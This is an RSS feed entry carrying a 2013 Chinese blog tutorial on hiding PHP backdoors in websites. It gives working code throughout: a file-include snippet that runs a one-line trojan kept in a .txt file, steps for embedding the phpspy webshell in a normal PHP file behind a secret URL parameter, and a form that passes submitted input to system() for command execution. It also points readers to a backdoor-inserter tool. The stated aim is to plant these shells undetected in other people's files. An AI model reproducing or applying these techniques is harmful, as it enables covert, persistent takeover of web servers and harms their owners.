<![CDATA[沧海一粟]]> http://www.dzhope.com/index.php zh-cn http://www.dzhope.com/post// <![CDATA[PHP后门隐藏]]> jed <jed521@163.com> Tue, 04 Jun 2013 15:50:47 +0000 http://www.dzhope.com/post//   

<?php
  $test=$_GET['test'];

  @include 'test/'.$test;

  ?>   

  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。   

方法2现在的webshell是越来越流行了,连php的后门也追上来了,主要的有angel的phpspy和 lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦)但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢?没有想过吗?呵呵,跟我来,我们用记事本打开phspy就好了,搜索登录入口四个字。 在

function loginpage() { ?>
后面加上

<? if ($ _ GET[name] == wrsky) { ?>
再在

<?php exit; }//end loginpage()
前面面加上

<? } ?>

现在你可以把这一个phpspy都写到对方的某个正常的php文件里,直接浏览是看不出问题的喔,我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的,只要替代上面 代码里的name和wrsky就可以的,相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话,这里就有样东西要介绍给你哦~php后门插入器,呵呵,你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔,粉PP吧~~我们来测试一下,我在这里提供一段 代码

< center>执行CMD命令</center> <form action= method=POST> <center>想执行的命令: <input name=cmd size=40 value=<?echo$cmd?>> <input name=action type=hidden value=run> <input type=submit class=INPUT value=执行<?echo PHP _ OS;?>系统命令></form> <td align=center> <textarea name=textarea cols=100 rows=25 readonly> <? if($ _ POST[action] == run){ @system($ _ POST[cmd]); } ?> </textarea>

这段 代码是执行cmd命令的,我们利用插入 工具 进行插入看看! 没插入前的样子我的设置为参数名为name,参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了,你也可以写成 /home/imaboy/bk.php(因为这是 linux 系统) 显示写入文件成功,我们开始连接咱的木马,以为我用的参数的name,值是wrsky,所以连接方式为 木马 所在地址?name=wrsky 大家可以看到,在输入后面的参数后运行完全正常,而且不易被发现喔,很可能被带到另外一台主机上去喔 。 ,
呵呵,只要想一点,你们肯定还会有更好的办法的!
Tags - , ]]> http://www.dzhope.com/post//#blogcomment <![CDATA[[评论] PHP后门隐藏]]> <user@domain.com> Thu, 01 Jan 1970 00:00:00 +0000 http://www.dzhope.com/post//#blogcomment